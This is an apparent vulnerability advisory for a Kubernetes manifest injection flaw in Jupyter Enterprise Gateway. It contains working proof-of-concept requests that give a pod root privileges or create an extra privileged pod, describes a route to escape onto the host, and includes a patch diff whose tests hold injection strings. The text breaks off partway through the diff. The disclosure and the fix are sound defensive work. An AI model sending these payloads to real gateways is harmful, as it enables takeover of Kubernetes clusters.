VYPR
Critical severity 10.0 · NVD Advisory · Published Jun 3, 2026 · Updated Jun 3, 2026

Jupyter Enterprise Gateway: Kubernetes Manifest Injection in Jinja2 Template Rendering

CVE-2026-44182

Description

Summary

The environment variables used during the rendering of the Kubernetes manifest allow YAML injection, enabling attackers to overwrite existing keys like securityContext and inject multi-document YAML to create additional unintended Kubernetes resources.

Details

The server interpolates untrusted environment variables (e.g., KERNEL_XXX) into Kubernetes manifests without YAML-aware escaping, enabling YAML injection attacks. Attackers can inject new fields, overwrite critical fields (e.g., duplicate securityContext keys, where the last one prevails), and inject document boundaries (--- for new documents, ... for end-of-document) to generate multiple resources, potentially creating arbitrary kinds like privileged pods.
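
To make the mechanism concrete, the following minimal sketch reproduces the effect with plain string formatting. It is an illustration under stated assumptions: `str.format` stands in for Jinja2, and the two-line template and the hostile value are simplified stand-ins rather than the project's actual template or the PoC payload.

```python
# Simplified stand-in for two lines of a pod manifest template.
# str.format plays the role of Jinja2 here (an assumption for illustration).
TEMPLATE = '    workingDir: "{kernel_working_dir}"\n    volumeMounts:\n'


def render_unescaped(kernel_working_dir: str) -> str:
    """Interpolate the value verbatim, with no YAML-aware escaping."""
    return TEMPLATE.format(kernel_working_dir=kernel_working_dir)


benign = render_unescaped("/home/jovyan")

# Hypothetical hostile value: it closes the opening quote early, adds new
# YAML lines, and ends with a comment that absorbs the template's closing quote.
hostile = render_unescaped('/tmp"\n  securityContext:\n    runAsUser: 0\n# ')

print(benign)
print(hostile)
```

The benign value stays on the single `workingDir` line, while the hostile value turns one template line into several, including a `securityContext` key that the template author never wrote.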

The Jinja2 template for the Kubernetes manifest contains several kernel_xxx variables, such as kernel_working_dir, that are substituted when the manifest is rendered; every one of them is a vector for YAML injection. https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L77

These values come from the environment passed in the API call, where they are named KERNEL_XXX before the names are converted to lowercase.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py#L130-L137
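
The name conversion described above could look roughly like the sketch below. The function name `kernel_keywords` and the sample environment are hypothetical, and the real launcher may process the values further; only the prefix filter and the lowercase conversion are taken from the description.

```python
def kernel_keywords(env: dict[str, str]) -> dict[str, str]:
    """Map KERNEL_* variables to lowercase template keywords."""
    return {
        name.lower(): value
        for name, value in env.items()
        if name.startswith("KERNEL_")
    }


# Hypothetical environment for illustration.
example_env = {
    "KERNEL_POD_NAME": "working-dir-root",
    "KERNEL_WORKING_DIR": "/tmp",
    "PATH": "/usr/bin",  # not KERNEL_-prefixed, so it is ignored
}

keywords = kernel_keywords(example_env)
print(keywords)
```

Note that nothing in this mapping inspects the values, so whatever the client sends reaches the template unchanged.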

PoC

These proofs of concept inject into the KERNEL_WORKING_DIR env var, but any of the KERNEL_ env vars could have been used. By default, KERNEL_WORKING_DIR is ignored unless EG_MIRROR_WORKING_DIRS is truthy for the enterprise-gateway. This is controlled by the mirrorWorkingDirs value in the Helm chart.

Using ducaale/xh:

xh http://localhost:31529/api/kernels env:=@env-working-dir-exploit.yaml

env-working-dir-exploit.yaml:

{
  "KERNEL_POD_NAME": "working-dir-root",
  "KERNEL_NAMESPACE": "notebooks",
  "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""
}

Resulting request:

POST /api/kernels HTTP/1.1
Accept: application/json, */*;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Content-Length: 233
Content-Type: application/json
Host: localhost:31529
User-Agent: xh/0.24.0

{
    "env": {
        "KERNEL_POD_NAME": "working-dir-root",
        "KERNEL_NAMESPACE": "notebooks",
        "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""
    }
}

Curl equivalent command:

curl http://localhost:31529/api/kernels -H 'content-type: application/json' -H 'accept: application/json, */*;q=0.5' -d '{"env":{"KERNEL_POD_NAME":"working-dir-root","KERNEL_NAMESPACE":"notebooks","KERNEL_WORKING_DIR":"\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""}}'
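
The payload carries two layers of escaping, which makes it hard to read. As a rough aid, the sketch below decodes only the outer JSON layer of the PoC value with the standard library. It does not model anything the gateway does after receiving the request.

```python
import json

# The KERNEL_WORKING_DIR member from the PoC, kept as raw JSON text.
raw_json = (
    r'{"KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:'
    r'\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100'
    r'\\n# HAHA - stray quote \""}'
)

# Decode the JSON layer only; the result is what the server receives as the
# environment variable's value.
value = json.loads(raw_json)["KERNEL_WORKING_DIR"]
print(value)
```

After JSON decoding, the value is still a single line: it begins and ends with a double quote and contains backslash-n pairs rather than real newlines. The rendered template shows actual line breaks, which suggests that a later step interprets those escapes before or during rendering.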

The rendered Jinja2 template:

# This file defines the Kubernetes objects necessary for kernels to run witihin Kubernetes.
# Substitution parameters are processed by the launch_kubernetes.py code located in the
# same directory.  Some values are factory values, while others (typically prefixed with 'kernel_') can be
# provided by the client.
#
# This file can be customized as needed.  No changes are required to launch_kubernetes.py provided kernel_
# values are used - which be automatically set from corresponding KERNEL_ env values.  Updates will be required
# to launch_kubernetes.py if new document sections (i.e., new k8s 'kind' objects) are introduced.
#
apiVersion: v1
kind: Pod
metadata:
  name: "working-dir-root"
  namespace: "notebooks"
  labels:
    kernel_id: "186f4ecf-bf90-40b8-b210-a0987bfce927"
    app: enterprise-gateway
    component: kernel
    source: kernel-pod.yaml
  annotations:
    cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
spec:
  restartPolicy: Never
  serviceAccountName: "default"
# NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
# WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
# will result in the new kernel pod's effective group of 0 (root)! although the user will
# correspond to the runAsUser value.  As a result, BOTH should be uncommented AND the feature-gate
# should be enabled to ensure expected behavior.  In addition, 'fsGroup: 100' is recommended so
# that /home/jovyan can be written to via the 'users' group (gid: 100) irrespective of the
# "kernel_uid" and "kernel_gid" values.
  securityContext:
    runAsUser: 1000
    runAsGroup: 100
    fsGroup: 100
  containers:
  - image: "elyra/kernel-py:3.2.3"
    name: "working-dir-root"
    env:
# Add any custom envs here that aren't already configured for the kernel's environment
#    - name: MY_CUSTOM_ENV
#      value: "my_custom_value"
    workingDir: "/tmp"

# INJECTION
  securityContext:
    runAsUser: 0
    runAsGroup: 0
    fsGroup: 100
# HAHA - stray quote "
    volumeMounts:
# Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
  volumes:
# Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client

Normally the container would run as uid=1000(jovyan) gid=100(users) groups=100(users). The payload injects a second pod-level securityContext with runAsUser: 0 and runAsGroup: 0 (and fsGroup: 100). When the YAML is processed, the duplicate key clobbers the original, so the container runs as uid=0(root) gid=0(root) groups=0(root),100(users).

In addition to injecting a pod-level securityContext, it is also possible to inject a container-level securityContext, which supports the privileged field.

Injecting a Pod

By injecting ... and --- it is possible to use multi-document YAML to inject Kubernetes resources.

xh http://localhost:31529/api/kernels env:=@env-working-dir-exploit-pod.yaml

env-working-dir-exploit-pod.yaml:

{
  "KERNEL_POD_NAME": "working-dir-root-pod",
  "KERNEL_NAMESPACE": "notebooks",
  "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n...\\n---\\napiVersion: v1\\nkind: Pod\\nmetadata:\\n  name: injected-pod\\n\\\n  spec:\\n  containers:\\n    - name: injected-container\\n      image: nginx\\n      ports:\\n        - containerPort: 80\\n      securityContext:\\n        privileged: true\\n        runAsUser: 0\\n        runAsGroup: 0\\n...\\n# HAHA - stray quote\""
}

This is rendered as follows (omitting the part of the rendering that precedes the injection point):

    workingDir: "/tmp"

# INJECTION
...
---
apiVersion: v1
kind: Pod
metadata:
  name: injected-pod
spec:
  containers:
    - name: injected-container
      image: nginx
      ports:
        - containerPort: 80
      securityContext:
        privileged: true
        runAsUser: 0
        runAsGroup: 0
...
# HAHA - stray quote"
    volumeMounts:
# Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
  volumes:
# Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client

kubectl get pods -n notebooks

NAME                   READY   STATUS    RESTARTS   AGE
injected-pod           1/1     Running   0          4s
working-dir-root-pod   1/1     Running   0          4s

The injected-pod has been created in addition to the working-dir-root-pod.
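
As a small illustration of why quoting matters for the document markers, the sketch below compares an unescaped rendering with a quoted one. It uses `json.dumps` as a standard-library stand-in for a YAML-aware quoting step (JSON strings are generally valid YAML double-quoted scalars); that substitution, the helper name `marker_lines`, and the sample value are assumptions made to keep the example dependency-free.

```python
import json

MARKERS = {"---", "..."}


def marker_lines(rendered: str) -> list[str]:
    """Return lines that consist solely of a YAML document marker."""
    return [line for line in rendered.splitlines() if line in MARKERS]


# Hypothetical value containing document markers on their own lines.
value = '/tmp"\n...\n---\napiVersion: v1\nkind: Pod\n# '

# Verbatim interpolation inside quotes, as in the vulnerable rendering.
unescaped = f'workingDir: "{value}"'

# Quoting step: newlines and quotes become escape sequences on one line.
quoted = f"workingDir: {json.dumps(value)}"

print(marker_lines(unescaped))
print(marker_lines(quoted))
```

In the unescaped rendering the markers land on lines of their own, where a YAML parser treats them as document boundaries. In the quoted rendering the whole value stays on one line, so no line can be read as a marker.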

kubectl get pod/injected-pod -o yaml -n notebooks -o jsonpath='{.spec.containers[*].securityContext}':

{
  "privileged": true,
  "runAsGroup": 0,
  "runAsUser": 0
}

Impact

An attacker can create pods running with an arbitrary image, securityContext, and volumeMounts, including hostPath mounts. Privileged pods can be created.

Arbitrary Kubernetes resources of the following kinds can be created: Pod, Secret, PersistentVolumeClaim, PersistentVolume, Service, and ConfigMap.

Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. Multiple container escape vectors exist. It is possible to create privileged pods which could load kernel modules to compromise the host. It is also possible to specify volume mounts, so another vector for a container escape is to use a hostPath R/W volume mount, use the injected securityContext to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.

Affected products (1)

Patches (3)

2258a41f9840

Fix YAML injection via KERNEL_* env vars (GHSA-cfw7-6c5v-2wjq)

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Apr 28, 2026 · Fixed in 3.3.0 · via ghsa-release-walk
7 files changed · +590 -45
  • enterprise_gateway/services/kernels/handlers.py +13 -7 modified
    @@ -18,6 +18,8 @@
     
     from ...mixins import CORSMixin, JSONErrorsMixin, TokenAuthorizationMixin
     
    +MAX_ENV_VALUE_LENGTH = 4096
    +
     
     class MainKernelHandler(
         TokenAuthorizationMixin, CORSMixin, JSONErrorsMixin, jupyter_server_handlers.MainKernelHandler
    @@ -66,13 +68,17 @@ async def post(self):
                 allowed_envs: list[str]
                 allowed_envs = model["env"].keys() if self.client_envs == ["*"] else self.client_envs
                 # Allow KERNEL_* args and those allowed by configuration.
    -            env.update(
    -                {
    -                    key: value
    -                    for key, value in model["env"].items()
    -                    if key.startswith("KERNEL_") or key in allowed_envs
    -                }
    -            )
    +            for key, value in model["env"].items():
    +                if key.startswith("KERNEL_") or key in allowed_envs:
    +                    if not isinstance(value, str):
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' value must be a string"
    +                        )
    +                    if len(value) > MAX_ENV_VALUE_LENGTH:
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' exceeds maximum length"
    +                        )
    +                    env[key] = value
     
                 # If kernel_headers are configured, fetch each of those and include in start request
                 kernel_headers = {}
    
  • enterprise_gateway/tests/test_yaml_injection.py +450 -0 added
    @@ -0,0 +1,450 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for YAML injection vulnerability fix (GHSA-cfw7-6c5v-2wjq)."""
    +
    +import os
    +import unittest
    +
    +import yaml
    +from jinja2 import Environment, FileSystemLoader, select_autoescape
    +
    +TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "kubernetes",
    +    "scripts",
    +)
    +
    +OPERATOR_TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "operators",
    +    "scripts",
    +)
    +
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +ALLOWED_K8S_KINDS = {
    +    "Pod",
    +    "Secret",
    +    "PersistentVolumeClaim",
    +    "PersistentVolume",
    +    "Service",
    +    "ConfigMap",
    +}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template."""
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
    +
    +def _build_keywords(env_overrides: dict) -> dict:
    +    """Build a keywords dict from env_overrides using the fixed parsing logic."""
    +    keywords = {}
    +    for name, value in env_overrides.items():
    +        if name.startswith("KERNEL_"):
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if isinstance(parsed, list) and all(isinstance(item, dict) for item in parsed):
    +                    keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
    +    return keywords
    +
    +
    +def _render_pod_template(keywords: dict) -> str:
    +    """Render the kernel-pod.yaml.j2 template with the yaml_safe filter."""
    +    j_env = Environment(
    +        loader=FileSystemLoader(os.path.normpath(TEMPLATE_DIR)),
    +        trim_blocks=True,
    +        lstrip_blocks=True,
    +        autoescape=select_autoescape(
    +            disabled_extensions=("j2", "yaml"),
    +            default_for_string=True,
    +            default=True,
    +        ),
    +    )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +    return j_env.get_template("/kernel-pod.yaml.j2").render(**keywords)
    +
    +
    +def _base_env() -> dict:
    +    return {
    +        "KERNEL_POD_NAME": "test-pod",
    +        "KERNEL_NAMESPACE": "default",
    +        "KERNEL_ID": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    +        "KERNEL_IMAGE": "elyra/kernel-py:3.2.3",
    +        "KERNEL_SERVICE_ACCOUNT_NAME": "default",
    +        "KERNEL_UID": "1000",
    +        "KERNEL_GID": "100",
    +    }
    +
    +
    +class TestYamlSafeStrFilter(unittest.TestCase):
    +    """Test the yaml_safe_str Jinja2 filter."""
    +
    +    def test_normal_string(self):
    +        result = yaml_safe_str("/home/jovyan")
    +        self.assertEqual(result, '"/home/jovyan"')
    +
    +    def test_string_with_quotes(self):
    +        result = yaml_safe_str('hello "world"')
    +        self.assertIn("hello", result)
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], 'hello "world"')
    +
    +    def test_string_with_newlines_escaped(self):
    +        result = yaml_safe_str("line1\nline2\nline3")
    +        self.assertNotIn("\n", result.strip('"'))
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "line1\nline2\nline3")
    +
    +    def test_document_boundary_escaped(self):
    +        result = yaml_safe_str("before\n---\nafter")
    +        parsed_docs = list(yaml.safe_load_all(f"key: {result}"))
    +        self.assertEqual(len(parsed_docs), 1)
    +        self.assertEqual(parsed_docs[0]["key"], "before\n---\nafter")
    +
    +    def test_end_of_document_marker_escaped(self):
    +        result = yaml_safe_str("before\n...\nafter")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIn("...", parsed["key"])
    +
    +    def test_none_serialized_as_yaml_null(self):
    +        result = yaml_safe_str(None)
    +        self.assertEqual(result, "null")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIsNone(parsed["key"])
    +
    +    def test_bool_serialized_as_yaml_bool(self):
    +        self.assertEqual(yaml_safe_str(True), "true")
    +        self.assertEqual(yaml_safe_str(False), "false")
    +        parsed_true = yaml.safe_load(f"key: {yaml_safe_str(True)}")
    +        parsed_false = yaml.safe_load(f"key: {yaml_safe_str(False)}")
    +        self.assertIs(parsed_true["key"], True)
    +        self.assertIs(parsed_false["key"], False)
    +
    +    def test_numeric_serialized_correctly(self):
    +        self.assertEqual(yaml_safe_str(1000), "1000")
    +        self.assertEqual(yaml_safe_str(3.14), "3.14")
    +        parsed_int = yaml.safe_load(f"key: {yaml_safe_str(1000)}")
    +        parsed_float = yaml.safe_load(f"key: {yaml_safe_str(3.14)}")
    +        self.assertEqual(parsed_int["key"], 1000)
    +        self.assertAlmostEqual(parsed_float["key"], 3.14)
    +
    +    def test_dict_rendered_as_flow_mapping(self):
    +        result = yaml_safe_str({"name": "data", "mountPath": "/data"})
    +        parsed = yaml.safe_load(f"- {result}")
    +        self.assertEqual(parsed[0]["name"], "data")
    +        self.assertEqual(parsed[0]["mountPath"], "/data")
    +
    +    def test_empty_string(self):
    +        result = yaml_safe_str("")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "")
    +
    +    def test_image_name_with_tag(self):
    +        result = yaml_safe_str("registry.example.com/org/image:v1.2.3")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "registry.example.com/org/image:v1.2.3")
    +
    +
    +class TestEnvVarParsing(unittest.TestCase):
    +    """Test that env var parsing correctly distinguishes scalar vs structured vars."""
    +
    +    def test_scalar_vars_remain_strings(self):
    +        env = {"KERNEL_IMAGE": "nginx:latest", "KERNEL_UID": "1000"}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_image"], "nginx:latest")
    +        self.assertIsInstance(keywords["kernel_image"], str)
    +        self.assertEqual(keywords["kernel_uid"], "1000")
    +        self.assertIsInstance(keywords["kernel_uid"], str)
    +
    +    def test_volume_mounts_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUME_MOUNTS": '[{"name": "data", "mountPath": "/data"}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volume_mounts"], list)
    +        self.assertEqual(keywords["kernel_volume_mounts"][0]["name"], "data")
    +
    +    def test_volumes_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUMES": '[{"name": "data", "emptyDir": {}}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volumes"], list)
    +
    +    def test_non_list_volume_rejected(self):
    +        env = {"KERNEL_VOLUME_MOUNTS": "not-a-list"}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_list_of_strings_volume_rejected(self):
    +        """List of strings (not dicts) should be rejected to prevent injection via loop items."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '["name: data\\nmountPath: /data"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_mixed_list_volume_rejected(self):
    +        """List containing both dicts and strings should be rejected."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '[{"name": "ok"}, "injected\\nstring"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_yaml_safe_load_not_applied_to_scalars(self):
    +        env = {"KERNEL_WORKING_DIR": '"injected\\nvalue"'}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_working_dir"], '"injected\\nvalue"')
    +        self.assertNotIn("\n", keywords["kernel_working_dir"])
    +
    +
    +class TestSecurityContextInjection(unittest.TestCase):
    +    """Test that securityContext injection via KERNEL_WORKING_DIR is blocked."""
    +
    +    def test_security_context_not_overridden(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = (
    +            '"/tmp\\"\\n\\nsecurityContext:\\n  runAsUser: 0\\n  runAsGroup: 0\\n  fsGroup: 100\\n"'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +
    +    def test_injection_via_kernel_image(self):
    +        env = _base_env()
    +        env["KERNEL_IMAGE"] = 'nginx"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_kernel_namespace(self):
    +        env = _base_env()
    +        env["KERNEL_NAMESPACE"] = 'default"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_volume_mounts_string_list_blocked_at_l1(self):
    +        """L1: list-of-strings in KERNEL_VOLUME_MOUNTS is rejected during parsing."""
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = (
    +            '["{name: data, mountPath: /data}\\n  securityContext:\\n    runAsUser: 0"]'
    +        )
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_injection_via_volume_mounts_blocked_at_l2(self):
    +        """L2: even if a string slips into volume_mounts, yaml_safe filter escapes it."""
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        keywords["kernel_volume_mounts"] = [
    +            "{name: data, mountPath: /data}\n  securityContext:\n    runAsUser: 0"
    +        ]
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        env["KERNEL_WORKING_DIR"] = (
    +            '/tmp\n...\n---\napiVersion: v1\nkind: Pod\nmetadata:\n'
    +            '  name: injected-pod\nspec:\n  containers:\n'
    +            '  - name: evil\n    image: nginx\n    securityContext:\n'
    +            '      privileged: true\n...\n'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        self.assertEqual(len(docs), 1, "Injected document should not create extra YAML documents")
    +        self.assertEqual(docs[0]["kind"], "Pod")
    +        self.assertEqual(docs[0]["metadata"]["name"], "test-pod")
    +
    +    def test_all_rendered_kinds_are_allowed(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        for doc in docs:
    +            self.assertIn(
    +                doc.get("kind"),
    +                ALLOWED_K8S_KINDS,
    +                f"Unexpected kind: {doc.get('kind')}",
    +            )
    +
    +    def test_duplicate_pod_kind_detected(self):
    +        """L3: if an attacker somehow injected a second Pod, document count validation catches it."""
    +        multi_pod_yaml = (
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: legit\n"
    +            "---\n"
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: evil\n"
    +        )
    +        docs = list(yaml.safe_load_all(multi_pod_yaml))
    +        kind_counts: dict[str, int] = {}
    +        for doc in docs:
    +            if doc:
    +                kind = doc.get("kind")
    +                kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +
    +        self.assertEqual(kind_counts.get("Pod"), 2)
    +        self.assertGreater(kind_counts["Pod"], 1, "Should detect duplicate Pod documents")
    +
    +
    +class TestNormalOperation(unittest.TestCase):
    +    """Test that the fix preserves normal kernel launch functionality."""
    +
    +    def test_basic_pod_renders_correctly(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        pod = docs[0]
    +        self.assertEqual(pod["kind"], "Pod")
    +        self.assertEqual(pod["metadata"]["name"], "test-pod")
    +        self.assertEqual(pod["metadata"]["namespace"], "default")
    +        self.assertEqual(pod["spec"]["containers"][0]["image"], "elyra/kernel-py:3.2.3")
    +        self.assertEqual(pod["spec"]["serviceAccountName"], "default")
    +
    +    def test_working_dir_set_correctly(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = "/home/jovyan/work"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        self.assertEqual(pod["spec"]["containers"][0]["workingDir"], "/home/jovyan/work")
    +
    +    def test_resource_limits_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_CPUS"] = "500m"
    +        env["KERNEL_MEMORY"] = "1Gi"
    +        env["KERNEL_CPUS_LIMIT"] = "1"
    +        env["KERNEL_MEMORY_LIMIT"] = "2Gi"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        resources = pod["spec"]["containers"][0]["resources"]
    +        self.assertEqual(resources["requests"]["cpu"], "500m")
    +        self.assertEqual(resources["requests"]["memory"], "1Gi")
    +        self.assertEqual(resources["limits"]["cpu"], "1")
    +        self.assertEqual(resources["limits"]["memory"], "2Gi")
    +
    +    def test_security_context_with_uid_gid(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        sc = pod["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +        self.assertEqual(sc["fsGroup"], 100)
    +
    +    def test_volume_mounts_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = '[{"name": "data-vol", "mountPath": "/data"}]'
    +        env["KERNEL_VOLUMES"] = '[{"name": "data-vol", "emptyDir": {}}]'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        mounts = pod["spec"]["containers"][0]["volumeMounts"]
    +        self.assertEqual(len(mounts), 1)
    +        self.assertEqual(mounts[0]["name"], "data-vol")
    +
    +        volumes = pod["spec"]["volumes"]
    +        self.assertEqual(len(volumes), 1)
    +        self.assertEqual(volumes[0]["name"], "data-vol")
    +
    +
    +class TestSparkOperatorTemplate(unittest.TestCase):
    +    """Test that the Spark operator template is also protected."""
    +
    +    def _render_operator_template(self, keywords: dict) -> str:
    +        j_env = Environment(
    +            loader=FileSystemLoader(os.path.normpath(OPERATOR_TEMPLATE_DIR)),
    +            trim_blocks=True,
    +            lstrip_blocks=True,
    +            autoescape=select_autoescape(
    +                disabled_extensions=("j2", "yaml"),
    +                default_for_string=True,
    +                default=True,
    +            ),
    +        )
    +        j_env.filters["yaml_safe"] = yaml_safe_str
    +        return j_env.get_template(
    +            "/sparkoperator.k8s.io-v1beta2.yaml.j2"
    +        ).render(**keywords)
    +
    +    def test_injection_via_kernel_image_blocked(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": 'nginx\nmalicious:\n  key: value',
    +            "kernel_id": "test-id",
    +            "spark_context_initialization_mode": "none",
    +            "eg_response_address": "1.2.3.4:8080",
    +            "eg_port_range": "0..0",
    +            "eg_public_key": "testkey",
    +            "kernel_service_account_name": "default",
    +            "kernel_executor_image": "elyra/kernel-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertIn("\n", doc["spec"]["image"])
    +        self.assertNotIn("malicious", doc)
    +
    +    def test_normal_spark_app_renders(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": "elyra/kernel-spark-py:3.2.3",
    +            "kernel_id": "test-id-123",
    +            "spark_context_initialization_mode": "lazy",
    +            "eg_response_address": "10.0.0.1:8080",
    +            "eg_port_range": "10000..11000",
    +            "eg_public_key": "abc123",
    +            "kernel_service_account_name": "spark-sa",
    +            "kernel_executor_image": "elyra/kernel-spark-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertEqual(doc["metadata"]["name"], "test-spark")
    +        self.assertEqual(doc["spec"]["image"], "elyra/kernel-spark-py:3.2.3")
    +        self.assertEqual(doc["spec"]["driver"]["serviceAccount"], "spark-sa")
    +
    +
    +if __name__ == "__main__":
    +    unittest.main()
    
  • etc/kernel-launchers/docker/scripts/launch_docker.py +6 -0 modified
    @@ -2,6 +2,7 @@
     
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -27,6 +28,11 @@ def launch_docker_kernel(
         if image_name is None:
             sys.exit("ERROR - KERNEL_IMAGE not found in environment - kernel launch terminating!")
     
    +    if not re.match(
